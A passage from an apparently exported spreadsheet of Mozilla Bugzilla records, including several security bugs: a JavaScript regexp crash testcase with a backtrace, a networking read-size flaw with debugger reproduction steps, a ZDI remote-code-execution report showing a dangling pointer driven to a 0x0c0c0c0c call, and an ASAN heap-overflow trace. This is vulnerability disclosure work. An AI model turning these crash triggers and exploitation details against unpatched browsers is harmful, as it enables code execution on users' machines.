          <t>[jsbugmon:update][post-critsmash-triage][adv-main48+]</t>
        </is>
      </c>
      <c r="Q2195" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2195" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2195" t="inlineStr">
        <is>
          <t>mozilla48</t>
        </is>
      </c>
      <c r="T2195" t="n">
        <v>1</v>
      </c>
      <c r="U2195" t="n">
        <v>0</v>
      </c>
      <c r="V2195" t="n">
        <v>15</v>
      </c>
      <c r="W2195" t="inlineStr">
        <is>
          <t>The following testcase crashes on mozilla-central revision b6acf4d4fc20 (build with --enable-optimize --enable-posix-nspr-emulation --enable-valgrind --enable-gczeal --target=i686-pc-linux-gnu --disable-tests --enable-simulator=arm --enable-debug, run with --arm-hwcap=vfp):
var summary = 'Do not overflow 64K boundary in treeDepth';
var N = 100 * 1000;
var a = new Array(N);
for (var i = 0; i != N; ++i) {
    a[i] = summary;
}
var str = a.join('|'); // str is 0|1|2|3|...|&lt;printed value of N -1&gt;
var re = new RegExp(str);
re.exec(N - 1);
Backtrace:
Program received signal SIGSEGV, Segmentation fault.
0x08461bb8 in bind (offset=&lt;optimized out&gt;, this=0xffff8c44) at js/src/jit/Label.h:56
#0  0x08461bb8 in bind (offset=&lt;optimized out&gt;, this=0xffff8c44) at js/src/jit/Label.h:56
#1  js::jit::Assembler::bind (this=this@entry=0xffff9e80, label=label@entry=0xffff8c44, boff=boff@entry=...) at js/src/jit/arm/Assembler-arm.cpp:2799
#2  0x088a1210 in js::irregexp::NativeRegExpMacroAssembler::CheckBacktrackStackLimit (this=this@entry=0xffff9e64) at js/src/irregexp/NativeRegExpMacroAssembler.cpp:1113
#3  0x088a9139 in js::irregexp::NativeRegExpMacroAssembler::PushBacktrack (this=0xffff9e64, label=0xffff8d1c) at js/src/irregexp/NativeRegExpMacroAssembler.cpp:1044
#4  0x088c0e7c in js::irregexp::Trace::Flush (this=this@entry=0xffff8f24, compiler=compiler@entry=0xffff9a10, successor=successor@entry=0xf1a25990) at js/src/irregexp/RegExpEngine.cpp:2805
#5  0x088c1283 in js::irregexp::RegExpNode::LimitVersions (this=this@entry=0xf1a25990, compiler=compiler@entry=0xffff9a10, trace=trace@entry=0xffff8f24) at js/src/irregexp/RegExpEngine.cpp:4710
#6  0x088c18ce in LimitVersions (trace=0xffff8f24, compiler=0xffff9a10, this=0xf1a25990) at js/src/irregexp/RegExpEngine.cpp:4642
#7  js::irregexp::ActionNode::Emit (this=0xf1a25990, compiler=0xffff9a10, trace=0xffff8f24) at js/src/irregexp/RegExpEngine.cpp:4531
#8  0x088c272b in js::irregexp::TextNode::Emit (this=0xf1548358, compiler=0xffff9a10, trace=0xffff8fd0) at js/src/irregexp/RegExpEngine.cpp:4007
#9  0x088b53b8 in js::irregexp::ChoiceNode::EmitOutOfLineContinuation (this=this@entry=0xf1a259c8, compiler=compiler@entry=0xffff9a10, trace=trace@entry=0xffff9110, alternative=..., alt_gen=alt_gen@entry=0xf0d315c0, preload_characters=preload_characters@entry=4, next_expects_preload=next_expects_preload@entry=true) at js/src/irregexp/RegExpEngine.cpp:4507
#10 0x088c31f5 in js::irregexp::ChoiceNode::Emit (this=0xf1a259c8, compiler=0xffff9a10, trace=0xffff93e4) at js/src/irregexp/RegExpEngine.cpp:4478
#11 0x088c17e4 in js::irregexp::ActionNode::Emit (this=0xf12d3c90, compiler=0xffff9a10, trace=0xffff9490) at js/src/irregexp/RegExpEngine.cpp:4579
#12 0x088b548d in js::irregexp::ChoiceNode::EmitOutOfLineContinuation (this=this@entry=0xf12d3cd8, compiler=compiler@entry=0xffff9a10, trace=trace@entry=0xffff95d0, alternative=..., alt_gen=alt_gen@entry=0xffff9640, preload_characters=preload_characters@entry=4, next_expects_preload=next_expects_preload@entry=false) at js/src/irregexp/RegExpEngine.cpp:4523
#13 0x088c31f5 in js::irregexp::ChoiceNode::Emit (this=0xf12d3cd8, compiler=0xffff9a10, trace=0xffff98c4) at js/src/irregexp/RegExpEngine.cpp:4478
#14 0x088b439b in js::irregexp::RegExpCompiler::Assemble (this=this@entry=0xffff9a10, cx=cx@entry=0xf7a76020, assembler=assembler@entry=0xffff9e64, start=start@entry=0xf12d3cd8, capture_count=0) at js/src/irregexp/RegExpEngine.cpp:1726
#15 0x088bf165 in js::irregexp::CompilePattern (cx=cx@entry=0xf7a76020, shared=shared@entry=0xf7a9b240, data=data@entry=0xffffa6c0, sample=sample@entry=..., is_global=is_global@entry=false, ignore_case=ignore_case@entry=false, is_ascii=true, match_only=match_only@entry=false, force_bytecode=force_bytecode@entry=false, sticky=sticky@entry=false, unicode=unicode@entry=false) at js/src/irregexp/RegExpEngine.cpp:1883
#16 0x08738c6d in js::RegExpShared::compile (this=this@entry=0xf7a9b240, cx=cx@entry=0xf7a76020, pattern=pattern@entry=..., input=input@entry=..., mode=mode@entry=js::RegExpShared::Normal, sticky=sticky@entry=false, force=force@entry=js::RegExpShared::DontForceByteCode) at js/src/vm/RegExpObject.cpp:561
#17 0x0873900d in js::RegExpShared::compile (this=0xf7a9b240, cx=0xf7a76020, input=..., mode=js::RegExpShared::Normal, sticky=false, force=js::RegExpShared::DontForceByteCode) at js/src/vm/RegExpObject.cpp:530
#18 0x087391c1 in js::RegExpShared::compileIfNecessary (this=&lt;optimized out&gt;, this@entry=0xf7a9b240, cx=&lt;optimized out&gt;, cx@entry=0xf7a76020, input=input@entry=..., mode=&lt;optimized out&gt;, mode@entry=js::RegExpShared::Normal, sticky=&lt;optimized out&gt;, sticky@entry=false, force=&lt;optimized out&gt;, force@entry=js::RegExpShared::DontForceByteCode) at js/src/vm/RegExpObject.cpp:583
#19 0x087392bb in js::RegExpShared::execute (this=this@entry=0xf7a9b240, cx=cx@entry=0xf7a76020, input=input@entry=..., start=start@entry=0, sticky=sticky@entry=false, matches=matches@entry=0xffffad60, endIndex=endIndex@entry=0x0) at js/src/vm/RegExpObject.cpp:597
#20 0x089955e3 in ExecuteRegExpImpl (cx=cx@entry=0xf7a76020, res=res@entry=0xf7a8b9d0, re=..., input=input@entry=..., searchIndex=0, sticky=sticky@entry=false, matches=matches@entry=0xffffad60, endIndex=endIndex@entry=0x0) at js/src/builtin/RegExp.cpp:107
#21 0x08995982 in ExecuteRegExp (cx=cx@entry=0xf7a76020, regexp=..., string=string@entry=..., lastIndex=&lt;optimized out&gt;, lastIndex@entry=0, sticky=sticky@entry=false, matches=matches@entry=0xffffad60, endIndex=endIndex@entry=0x0, staticsUpdate=staticsUpdate@entry=js::UpdateRegExpStatics) at js/src/builtin/RegExp.cpp:868
#22 0x08998db6 in RegExpMatcherImpl (cx=cx@entry=0xf7a76020, regexp=..., regexp@entry=..., string=string@entry=..., lastIndex=0, sticky=sticky@entry=false, staticsUpdate=staticsUpdate@entry=js::UpdateRegExpStatics, rval=rval@entry=...) at js/src/builtin/RegExp.cpp:888
#23 0x08999054 in js::RegExpMatcher (cx=0xf7a76020, argc=4, vp=0xf4125168) at js/src/builtin/RegExp.cpp:924
#24 0x086a42aa in js::CallJSNative (cx=0xf7a76020, native=0x8998f00 &lt;js::RegExpMatcher(JSContext*, unsigned int, JS::Value*)&gt;, args=...) at js/src/jscntxtinlines.h:235
[...]
#52 main (argc=3, argv=0xffffcbf4, envp=0xffffcc04) at js/src/shell/js.cpp:7250
eax	0x0	0
ebx	0x9855438	159732792
ecx	0xf7e3a88c	-136075124
edx	0x0	0
esi	0x400062b8	1073767096
edi	0xffff8c44	-29628
ebp	0xffff8c08	4294937608
esp	0xffff8bb0	4294937520
eip	0x8461bb8 &lt;js::jit::Assembler::bind(js::jit::Label*, js::jit::BufferOffset)+632&gt;
=&gt; 0x8461bb8 &lt;js::jit::Assembler::bind(js::jit::Label*, js::jit::BufferOffset)+632&gt;:	movl   $0x38,0x0
   0x8461bc2 &lt;js::jit::Assembler::bind(js::jit::Label*, js::jit::BufferOffset)+642&gt;:	call   0x80fcb10 &lt;abort()&gt;
I'm not sure what's going on here but an offset not having the expected size/width doesn't sound nice to me, marking s-s.</t>
        </is>
      </c>
      <c r="X2195" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2196">
      <c r="A2196" t="n">
        <v>1811627</v>
      </c>
      <c r="B2196" t="inlineStr">
        <is>
          <t>2023-01-20 14:37:53 -0800</t>
        </is>
      </c>
      <c r="C2196" t="inlineStr">
        <is>
          <t>Potential write beyond bounds caused by ThrottleInputStream::Read()/ReadSegments()</t>
        </is>
      </c>
      <c r="D2196" t="inlineStr">
        <is>
          <t>2024-05-30 11:04:21 -0700</t>
        </is>
      </c>
      <c r="E2196" t="n">
        <v>1</v>
      </c>
      <c r="F2196" t="n">
        <v>1</v>
      </c>
      <c r="G2196" t="n">
        <v>3</v>
      </c>
      <c r="H2196" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2196" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2196" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K2196" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2196" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2196" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2196" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2196" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2196" t="inlineStr">
        <is>
          <t>[necko-triaged][necko-priority-queue][adv-main111+][adv-esr102.9+]</t>
        </is>
      </c>
      <c r="Q2196" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2196" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S2196" t="inlineStr">
        <is>
          <t>112 Branch</t>
        </is>
      </c>
      <c r="T2196" t="n">
        <v>1</v>
      </c>
      <c r="U2196" t="n">
        <v>0</v>
      </c>
      <c r="V2196" t="n">
        <v>13</v>
      </c>
      <c r="W2196" t="inlineStr">
        <is>
          <t>Created attachment 9313375
ffbug_2080.htm
`ThrottleInputStream::Read()/ReadSegments()` (`netwerk/base/ThrottleQueue.cpp` ) ignore the caller's requested read size `aCount`, potentially causing lower layers to read data into memory beyond the end of a caller's buffer.
`ThrottleInputStream` is used only by `ThrottleQueue`. I have found one user (the throttling control on the Developer Tools panel) which can be used to observe usage of the incorrect read size, but which doesn't suffer a WBB (write beyond bounds) because the read size is not used to buffer data, only to send data out a socket. I am not sure whether there are other users, though `nsHttpTransaction::Init()` has the ability to use the class via its `eventSink` argument.
The bug is that `ThrottleInputStream::Read()/ReadSegments()` don't minimize the amount of data potentially available in the underlying stream (`realCount`) against the requested read size `aCount`. (While `Available()`, line 110, takes `aCount`, it doesn't use it):
```
102: NS_IMETHODIMP
103: ThrottleInputStream::ReadSegments(nsWriteSegmentFun aWriter, void* aClosure,
104:                                   uint32_t aCount, uint32_t* aResult) {
...
109:   uint32_t realCount;
110:   nsresult rv = mQueue-&gt;Available(aCount, &amp;realCount);
111:   if (NS_FAILED(rv)) {
112:     return rv;
113:   }
114: 
115:   if (realCount == 0) {
116:     return NS_BASE_STREAM_WOULD_BLOCK;
117:   }
118: 
119:   rv = mStream-&gt;ReadSegments(aWriter, aClosure, realCount, aResult);
120:   if (NS_SUCCEEDED(rv) &amp;&amp; *aResult &gt; 0) {
121:     mQueue-&gt;RecordRead(*aResult);
122:   }
123:   return rv;
124: 
125: }
```
[This function doesn't use `aRemaining`:]
```
267: NS_IMETHODIMP
268: ThrottleQueue::Available(uint32_t aRemaining, uint32_t* aAvailable) {
269:   MOZ_ASSERT(OnSocketThread(), "not on socket thread");
270:   TimeStamp now = TimeStamp::Now();
271:   TimeStamp oneSecondAgo = now - TimeDuration::FromSeconds(1);
272:   size_t i;
273: 
274:   // Remove all stale events.
275:   for (i = 0; i &lt; mReadEvents.Length(); ++i) {
276:     if (mReadEvents[i].mTime &gt;= oneSecondAgo) {
277:       break;
278:     }
279:   }
280:   mReadEvents.RemoveElementsAt(0, i);
281: 
282:   uint32_t totalBytes = 0;
283:   for (i = 0; i &lt; mReadEvents.Length(); ++i) {
284:     totalBytes += mReadEvents[i].mBytesRead;
285:   }
286: 
287:   uint32_t spread = mMaxBytesPerSecond - mMeanBytesPerSecond;
288:   double prob = static_cast&lt;double&gt;(rand()) / RAND_MAX;
289:   uint32_t thisSliceBytes =
290:       mMeanBytesPerSecond - spread + static_cast&lt;uint32_t&gt;(2 * spread * prob);
291: 
292:   if (totalBytes &gt;= thisSliceBytes) {
293:     *aAvailable = 0;
294:   } else {
295:     *aAvailable = thisSliceBytes;
296:   }
297:   return NS_OK;
298: }
```
You can verify that `ThrottleInputStream::ReadSegments()` can call the lower layer with a byte count exceeding `aCount` by doing the following:
   1. Start FF and attach a debugger to it.
   2. Set a BP in `ThrottleInputStream::ReadSegments()` on the call to `mStream-&gt;ReadSegments()`.
   3. Open FF's Web Developer Tools panel, then the network tab.
   4. Check "Disable Cache" and select "WiFi" from the throttling control.
   5. Put ffbug_2080.htm on a webserver. If the server is not running on 127.0.0.1, modify ffbug_2080.htm appropriately to do the GET request to the appropriate server.
   6. Load ffbug_2080.htm in FF.
   7. When the BP fires, examine `realCount`. Notice that it far exceeds `aCount` (in my test, `realCount` was `0x1e0000` and `aCount` was `0x8000`.
   8. Step into `mStream-&gt;ReadSegments()`. Control should end up in `nsStringInputStream::ReadSegments()`. Proceed to the line beginning
   ```
      nsresult = aWriter(...);
   ```
   and notice that `source` (as limited by this function's `aCount` and `maxCount`) contains the initial HTTP request to fetch ffbug_2080.htm. The request isn't very long, so it doesn't exceed the original `aCount` (0x8000).
   9. Proceed, take the BP again, step into `mStream-&gt;ReadSegments()` again, and proceed as in step 8. Notice that this function's `aCount` is now `0` because `maxCount` is `0`.
   10. Proceed and take the BP again, and step into `mStream-&gt;ReadSegments()` again, and proceed as in step 8. Notice that `source` contains the long `GET` request that the script in ffbug_2080.htm generated, and that the function's `aCount` and `maxCount` are both `0xc877`. This is much greater than the `aCount` that `ThrottleInputStream::ReadSegments()`'s caller requested (`0x8000`).
   11. You can trace all the way into `nsHttpConnection::OnReadSegment()` and find that `0xc877` bytes do get written to the socket.</t>
        </is>
      </c>
      <c r="X2196" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2197">
      <c r="A2197" t="n">
        <v>730315</v>
      </c>
      <c r="B2197" t="inlineStr">
        <is>
          <t>2012-02-24 08:22:13 -0800</t>
        </is>
      </c>
      <c r="C2197" t="inlineStr">
        <is>
          <t>[traceback] karma recalculate points task busted</t>
        </is>
      </c>
      <c r="D2197" t="inlineStr">
        <is>
          <t>2012-02-29 10:49:29 -0800</t>
        </is>
      </c>
      <c r="E2197" t="n">
        <v>1</v>
      </c>
      <c r="F2197" t="n">
        <v>1</v>
      </c>
      <c r="G2197" t="n">
        <v>5</v>
      </c>
      <c r="H2197" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I2197" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J2197" t="inlineStr">
        <is>
          <t>Users and Groups</t>
        </is>
      </c>
      <c r="K2197" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2197" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2197" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2197" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2197" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2197" t="inlineStr">
        <is>
          <t>u=dev c=karma s=2012.4 p=1 [qa-]</t>
        </is>
      </c>
      <c r="Q2197" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R2197" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2197" t="inlineStr">
        <is>
          <t>2012-03-06</t>
        </is>
      </c>
      <c r="T2197" t="n">
        <v>1</v>
      </c>
      <c r="U2197" t="n">
        <v>0</v>
      </c>
      <c r="V2197" t="n">
        <v>7</v>
      </c>
      <c r="W2197" t="inlineStr">
        <is>
          <t>Task karma.tasks.recalculate_karma_points with id 62158dc0-8ce8-420f-ae1a-ce6bcdac291a raised exception:
'TypeError("\'set\' object is unsubscriptable",)'
Task was called with args: [] kwargs: {}.
The contents of the full traceback was:
Traceback (most recent call last):
  File "/data/www/support.mozilla.com/kitsune/vendor/src/celery/celery/execute/trace.py", line 34, in trace
    return cls(states.SUCCESS, retval=fun(*args, **kwargs))
  File "/data/www/support.mozilla.com/kitsune/vendor/src/celery/celery/task/base.py", line 227, in __call__
    return self.run(*args, **kwargs)
  File "/data/www/support.mozilla.com/kitsune/vendor/src/celery/celery/app/__init__.py", line 141, in run
    return fun(*args, **kwargs)
  File "/data/www/support.mozilla.com/kitsune/apps/karma/tasks.py", line 48, in recalculate_karma_points
    for chunk in chunked(KarmaManager().user_ids(), 2500):
  File "/data/www/support.mozilla.com/kitsune/apps/sumo/utils.py", line 51, in chunked
    yield seq[i:i + n]
TypeError: 'set' object is unsubscriptable</t>
        </is>
      </c>
      <c r="X2197" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2198">
      <c r="A2198" t="n">
        <v>598669</v>
      </c>
      <c r="B2198" t="inlineStr">
        <is>
          <t>2010-09-22 09:39:39 -0700</t>
        </is>
      </c>
      <c r="C2198" t="inlineStr">
        <is>
          <t>LookupGetterOrSetter Remote Code Execution Vulnerability (ZDI-CAN-929)</t>
        </is>
      </c>
      <c r="D2198" t="inlineStr">
        <is>
          <t>2010-11-06 14:58:27 -0700</t>
        </is>
      </c>
      <c r="E2198" t="n">
        <v>1</v>
      </c>
      <c r="F2198" t="n">
        <v>1</v>
      </c>
      <c r="G2198" t="n">
        <v>3</v>
      </c>
      <c r="H2198" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2198" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2198" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K2198" t="inlineStr">
        <is>
          <t>1.9.2 Branch</t>
        </is>
      </c>
      <c r="L2198" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2198" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2198" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2198" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2198" t="inlineStr">
        <is>
          <t>[sg:critical] fixed on trunk by 509075</t>
        </is>
      </c>
      <c r="Q2198" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2198" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2198" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2198" t="n">
        <v>1</v>
      </c>
      <c r="U2198" t="n">
        <v>0</v>
      </c>
      <c r="V2198" t="n">
        <v>13</v>
      </c>
      <c r="W2198" t="inlineStr">
        <is>
          <t>Created attachment 477535
testcase (crashes 1.9.2)
Submitted to security@m.o today via ZDI:
------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in js3250.dll. When a JavaObject is created and deleted, there is not a proper sanity check for the LookupGetterorSetter() function, which can result in a dangling pointer being passed to the JS_ValueToId() function. A remote attacker can exploit this vulnerability to execute arbitrary code under the context of the SYSTEM user.
Version(s)  tested: Mozilla Firefox 3.6.8
Platform(s) tested: Windows XP SP3 x86
From js/src/xpconnect/src/xpcquickstubs.cpp:
JSBool
xpc_qsDefineQuickStubs(JSContext *cx, JSObject *proto, uintN flags,
PRUint32 ifacec, const nsIID **interfaces,
PRUint32 tableSize, const xpc_qsHashEntry *table) {
...
static JSFunctionSpec getterfns[] = {
JS_FN("__lookupGetter__", SharedLookupGetter, 1, 0),
JS_FN("__lookupSetter__", SharedLookupSetter, 1, 0),
JS_FN("__defineGetter__", SharedDefineGetter, 2, 0),
JS_FN("__defineSetter__", SharedDefineSetter, 2, 0),
JS_FS_END
};
if(definedProperty &amp;&amp; !JS_DefineFunctions(cx, proto, getterfns))
return JS_FALSE;
return JS_TRUE;
}
static JSBool
SharedLookupGetter(JSContext *cx, uintN argc, jsval *vp) {
return LookupGetterOrSetter(cx, PR_TRUE, vp); }
static JSBool
LookupGetterOrSetter(JSContext *cx, JSBool wantGetter, jsval *vp) {
...
JSObject *obj = JS_THIS_OBJECT(cx, vp);
if (!obj)
return JS_FALSE;
jsval idval = JS_ARGV(cx, vp)[0];
const char *name = JSVAL_IS_STRING(idval)
? JS_GetStringBytes(JSVAL_TO_STRING(idval))
: nsnull;
if(!JS_ValueToId(cx, idval, &amp;interned_id) ||
!JS_LookupPropertyWithFlagsById(cx, obj, interned_id,
JSRESOLVE_QUALIFIED, &amp;obj2, &amp;v) ||
(obj2 &amp;&amp;
!JS_GetPropertyAttrsGetterAndSetterById(cx, obj2, interned_id, &amp;attrs,
&amp;found, &amp;getter, &amp;setter)))
return JS_FALSE;
...
}
Function LookupGetterOrSetter() lacks important sanity check: it assumes that there was at least one argument passed from caller. When __lookupGetter__ is called with no arguments on JavaScript stack, JS_ARGV(cx, vp)[0] returns jsval which represents potentially uninitialized memory (or some leftovers from previous computations?). This, for example, can be a pointer to already freed JS object. Such dangling pointer is later passed to JS_ValueToId().
&lt;&lt;&lt;&lt;&lt;&lt;EDX gets the value 0c0c0c0c, which will soon be called&gt;&gt;&gt;&gt;&gt;&gt;&gt;
0:000&gt; p
eax=0012cb58 ebx=02deb800 ecx=0012cbf0 edx=08000001 esi=0012cbd0
edi=0012cbf0
eip=0031cc2b esp=0012caf0 ebp=0012cb4c iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
js3250!JS_ComputeThis+0x8eb:
0031cc2b 50 push eax
0:000&gt; dc edx
08000001 0c0c0c0c 0c0c0c0c 0c0c0c0c 0c0c0c0c ................
08000011 0c0c0c0c 0c0c0c0c 0c0c0c0c 0c0c0c0c ................
08000021 0c0c0c0c 0c0c0c0c 0c0c0c0c 0c0c0c0c ................
08000031 0c0c0c0c 0c0c0c0c 0c0c0c0c 0c0c0c0c ................
08000041 0c0c0c0c 0c0c0c0c 0c0c0c0c 0c0c0c0c ................
08000051 0c0c0c0c 0c0c0c0c 0c0c0c0c 0c0c0c0c ................
08000061 0c0c0c0c 0c0c0c0c 0c0c0c0c 0c0c0c0c ................
08000071 0c0c0c0c 0c0c0c0c 0c0c0c0c 0c0c0c0c ................
&lt;&lt;&lt;&lt;&lt;&lt;The function that is responsible for calling into EDX&gt;&gt;&gt;&gt;&gt;&gt;
sub_31CC20 proc near
arg_0= dword ptr 4
arg_4= dword ptr 8
arg_8= dword ptr 0Ch
mov eax, [ecx] ; 00312494
mov edx, [eax]
mov eax, [esp+arg_8]
mov edx, [edx+20h]
push eax
mov eax, [esp+4+arg_4]
push eax
push ecx
mov ecx, [esp+0Ch+arg_0]
push ecx
call edx ; calls the value in edx
; in this case edx = 0c0c0c0c
-- CREDIT --------------------------------------------------------------
This vulnerability was discovered by:
    * regenrecht</t>
        </is>
      </c>
      <c r="X2198" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2199">
      <c r="A2199" t="n">
        <v>649281</v>
      </c>
      <c r="B2199" t="inlineStr">
        <is>
          <t>2011-04-12 03:30:05 -0700</t>
        </is>
      </c>
      <c r="C2199" t="inlineStr">
        <is>
          <t>Add ircs:// to url protocols for external links in comment</t>
        </is>
      </c>
      <c r="D2199" t="inlineStr">
        <is>
          <t>2011-10-19 08:49:54 -0700</t>
        </is>
      </c>
      <c r="E2199" t="n">
        <v>1</v>
      </c>
      <c r="F2199" t="n">
        <v>1</v>
      </c>
      <c r="G2199" t="n">
        <v>4</v>
      </c>
      <c r="H2199" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2199" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J2199" t="inlineStr">
        <is>
          <t>User Interface</t>
        </is>
      </c>
      <c r="K2199" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2199" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2199" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2199" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2199" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2199" t="inlineStr"/>
      <c r="Q2199" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R2199" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2199" t="inlineStr">
        <is>
          <t>Bugzilla 4.0</t>
        </is>
      </c>
      <c r="T2199" t="n">
        <v>1</v>
      </c>
      <c r="U2199" t="n">
        <v>0</v>
      </c>
      <c r="V2199" t="n">
        <v>4</v>
      </c>
      <c r="W2199" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Macintosh; Intel Mac OS X 10.5; rv:2.0) Gecko/20100101 Firefox/4.0
Build Identifier: 
* ircs://random.stuff/here should be a clickable link like irc://random.stuff/here
Reproducible: Always
Steps to Reproduce:
1. Look at the opening comment
2. Try to click ircs://
3. Watch and discover that it's just text</t>
        </is>
      </c>
      <c r="X2199" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2200">
      <c r="A2200" t="n">
        <v>734288</v>
      </c>
      <c r="B2200" t="inlineStr">
        <is>
          <t>2012-03-08 16:45:16 -0800</t>
        </is>
      </c>
      <c r="C2200" t="inlineStr">
        <is>
          <t>ASAN: Heap-buffer-overflow WRITE of size 1 at nsSVGFEDiffuseLightingElement::LightPixel</t>
        </is>
      </c>
      <c r="D2200" t="inlineStr">
        <is>
          <t>2024-05-29 15:57:42 -0700</t>
        </is>
      </c>
      <c r="E2200" t="n">
        <v>1</v>
      </c>
      <c r="F2200" t="n">
        <v>1</v>
      </c>
      <c r="G2200" t="n">
        <v>3</v>
      </c>
      <c r="H2200" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2200" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2200" t="inlineStr">
        <is>
          <t>SVG</t>
        </is>
      </c>
      <c r="K2200" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2200" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2200" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2200" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2200" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2200" t="inlineStr">
        <is>
          <t>[asan][sg:crititcal][release drivers: see comment 24][qa+]</t>
        </is>
      </c>
      <c r="Q2200" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2200" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2200" t="inlineStr">
        <is>
          <t>mozilla13</t>
        </is>
      </c>
      <c r="T2200" t="n">
        <v>1</v>
      </c>
      <c r="U2200" t="n">
        <v>0</v>
      </c>
      <c r="V2200" t="n">
        <v>36</v>
      </c>
      <c r="W2200" t="inlineStr">
        <is>
          <t>Created attachment 604258
Repro-file
==5860== ERROR: AddressSanitizer heap-buffer-overflow on address 0x7f23312cdda8 at pc 0x7f235665c341 bp 0x7fff1d8b5550 sp 0x7fff1d8b5548
WRITE of size 1 at 0x7f23312cdda8 thread T0
    #0 0x7f235665c341 in nsSVGFEDiffuseLightingElement::LightPixel(float const*, float const*, unsigned int, unsigned char*) /home/attekett/src/content/svg/content/src/nsSVGFilters.cpp:5298
    #1 0x7f235665ace9 in nsSVGFELightingElement::Filter(nsSVGFilterInstance*, nsTArray&lt;nsSVGFE::Image const*, nsTArrayDefaultAllocator&gt; const&amp;, nsSVGFE::Image const*, nsIntRect const&amp;) /home/attekett/src/content/svg/content/src/nsSVGFilters.cpp:5094
    #2 0x7f23565acf04 in nsSVGFilterInstance::Render(gfxASurface**) /home/attekett/src/layout/svg/base/src/nsSVGFilterInstance.cpp:529
    #3 0x7f23565a7a93 in nsSVGFilterFrame::FilterPaint(nsRenderingContext*, nsIFrame*, nsSVGFilterPaintCallback*, nsIntRect const*) /home/attekett/src/layout/svg/base/src/nsSVGFilterFrame.cpp:264
    #4 0x7f23565df61f in nsSVGUtils::PaintFrameWithEffects(nsRenderingContext*, nsIntRect const*, nsIFrame*) /home/attekett/src/layout/svg/base/src/nsSVGUtils.cpp:1141
    #5 0x7f23565a2f8e in nsSVGDisplayContainerFrame::PaintSVG(nsRenderingContext*, nsIntRect const*) /home/attekett/src/layout/svg/base/src/nsSVGContainerFrame.cpp:175
    #6 0x7f23565ceb59 in nsSVGOuterSVGFrame::Paint(nsDisplayListBuilder const*, nsRenderingContext*, nsRect const&amp;, nsPoint) /home/attekett/src/layout/svg/base/src/nsSVGOuterSVGFrame.cpp:672
    #7 0x7f23565ce8bb in nsDisplaySVG::Paint(nsDisplayListBuilder*, nsRenderingContext*) /home/attekett/src/layout/svg/base/src/nsSVGOuterSVGFrame.cpp:566
